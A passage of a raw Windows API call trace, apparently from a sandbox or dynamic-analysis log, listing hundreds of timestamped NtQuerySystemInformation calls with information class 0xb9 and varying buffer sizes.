(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x38, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0272.213] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc410, Length=0x20, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcda0, Length=0x28, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x20, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc50, Length=0x20, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce8, Length=0x28, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb10, Length=0x20, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb10, Length=0x20, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x20, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x20, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbc0, Length=0x20, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb90, Length=0x20, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb90, Length=0x20, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.217] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca70, Length=0x28, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca80, Length=0x48, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcb38, Length=0x48, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca80, Length=0x48, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x28, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc60, Length=0x40, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0272.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0272.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc950, Length=0x50, ResultLength=0x0) [0272.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc840, Length=0x50, ResultLength=0x0) [0272.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0272.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0272.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5a0, Length=0x28, ResultLength=0x0) [0272.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc610, Length=0x28, ResultLength=0x0) [0272.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc770, Length=0x38, ResultLength=0x0) [0272.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc690, Length=0x28, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 